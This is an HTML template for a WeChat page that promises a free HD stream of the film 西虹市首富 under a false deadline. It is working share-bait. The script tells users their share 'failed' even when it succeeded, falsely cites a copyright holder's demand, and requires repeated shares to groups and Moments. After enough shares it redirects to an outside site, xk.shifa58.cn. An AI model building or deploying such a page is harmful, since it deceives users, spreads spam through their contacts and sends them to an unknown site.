<!DOCTYPE html>
<html lang="en-US">

<head>
    <meta charset="utf-8">
    <title>速看!《西虹市首富》高清版,在线观看!!2小时后删除!</title>
    <meta property="qc:admins" content="" />
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black" />
    <meta name="format-detection" content="telephone=no" />
    <link rel="stylesheet" href="/Public/css/index.css">
    
</head>
<script type="text/javascript" src="http://res.wx.qq.com/open/js/jweixin-1.4.0.js"></script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.js"></script>
<script>
//初始化分享次数为0
var i = 0;

wx.config({
   debug: false, // 开启调试模式,调用的所有api的返回值会在客户端alert出来，若要查看传入的参数，可以在pc端打开，参数信息会通过log打出，仅在pc端时才会打印。
   appId: "{$jssdk['appId']}", // 必填，公众号的唯一标识
   timestamp: {$jssdk['timestamp']} , // 必填，生成签名的时间戳
   nonceStr: "{$jssdk['nonceStr']}", // 必填，生成签名的随机串
   signature: "{$jssdk['signature']}",// 必填，签名，见附录1
   jsApiList: "{:json_encode($jssdk['jsApiList'])}" // 必填，需要使用的JS接口列表，所有JS接口列表见附录2
 });



 wx.ready(function(){
  //自定义“分享给朋友”及“分享到QQ”按钮的分享内容
  wx.updateAppMessageShareData({
    title: "{$shareData['title']}", // 分享标题
    desc: "{$shareData['desc']}", // 分享描述
    link: "{$link}", // 分享链接
    imgUrl: "{$shareData['imgurl']}", // 分享图标
    success: function () {
      $.ajax({
          url: "{:url('index/clicknums')}",
          type: 'POST',
          dataType: 'json',
          data: {'type': 1},
          success:function(data){
             $(".box2").css("display","none");
             if (i === 0) {
                $(".box2").css("display","block");
                $(".box2").children('p').eq(1).html("分享成功!");
                $(".box2").children('p').eq(2).html("请继续分享到<span style='color:red;font-size:30px;'>2</span>个不同的群即可观看!!");
              }else if (i === 1) {  //分享完一次
                $(".box2").css("display","block");
                $(".box2").children('p').eq(1).html("分享失败!");
                $(".box2").children('p').eq(2).html("请继续分享到<span style='color:red;font-size:20px;'>2</span>个不同的群!!");
                $(".box2").children('p').eq(1).after("<p style='line-height: 30px;'>注意:分享到相同的群会失败</p>");
              }else if (i === 2) {
                $(".box2").css("display","block");
                $(".box2").children('p').eq(1).html("分享成功!");
                $(".box2").children('p').eq(2).html("请继续分享到<span style='color:red;font-size:30px;'>朋友圈</span>即可观看!!");
                
              }else if (i === 3) {
                window.location.href = "http://xk.shifa58.cn/mz1/";
                i = 0;
              }
              i = i+1;
          }
      })

    },
    cancel: function () {
      // 用户取消分享后执行的回调函数

    }
  });
  //自定义“分享到朋友圈”及“分享到QQ空间”按钮的分享内容
   wx.updateTimelineShareData({
    title: "{$shareData['title']}", // 分享标题
    desc: "{$shareData['desc']}", // 分享描述
    link: "{$link}", // 分享链接
    imgUrl: "{$shareData['imgurl']}", // 分享图标
    success: function () {
       $(".box2").css("display","none");
       if (i == 0 || i == 1 || i==2 ) {
          $(".box2").css("display","block");
          $(".box2").children('p').eq(1).html("分享失败!");
          $(".box2").children('p').eq(2).html("请分享到群即可观看!!");
        }else if (i == 3) {
          window.location.href = "http://xk.shifa58.cn/mz1/";
          i = 0;
        }
        i = i+1;
    },
    cancel: function () {
      alert('33333');
    }
  });
 });
</script>

<body>
<div>
    <img class="img" src="https://i2.meizitu.net/2018/12/25a01.jpg">
</div>
<div class="tite">《西红柿首富》高清版！</div>
<div class="lx"><span class="pf">9.6分</span>喜剧/剧情</div>
<div>
    <p class="lx">主演： 沈腾/宋芸桦/张一鸣/张晨光</p>
    <p class="lx">导演：闫非/彭大魔</p>
    <p class="new">
        《西虹市首富》的故事发生在《夏洛特烦恼》中的“特烦恼”之城“西虹市”。混迹于丙级业余足球队的守门员王多鱼（沈腾饰演），因比赛失利被开除离队。正处于人生最低谷的他接受了神秘台湾财团“一个月花光十亿资金”的挑战。本以为快乐生活就此开始，王多鱼却第一次感到“花钱特烦恼”！想要人生反转走上巅峰，真的没有那么简单......</p>
    <p class="ly">免费/高清</p>
</div>

<button id="btn">点击观看</button>
<div class="zx">最新推荐</div>

<div class="box1"><img class="img2" src="https://i2.meizitu.net/2018/12/28e01.jpg">
    <ul class="oul lx">
        <li>我不是药神</li>
        <li>类型: 喜剧 / 剧情</li>
        <li>上映日期: 2018-07-05</li>
        <li>清晰度: 高清</li>
        <li>状态: 在线</li>
    </ul>
</div>
<div class="abs"><img class="img3" src="https://i2.meizitu.net/2019/01/01g01.jpg">

</div>
<div class="box2">

    <p style="line-height: 40px;">温馨提示</p>
    <p style="line-height: 30px;color: red">应版权方宣传要求</p>
    <p style="line-height: 30px;">发送到微信群即可观看全集</p>
    <button id="btn2">好</button>

</div>

</body>

</html>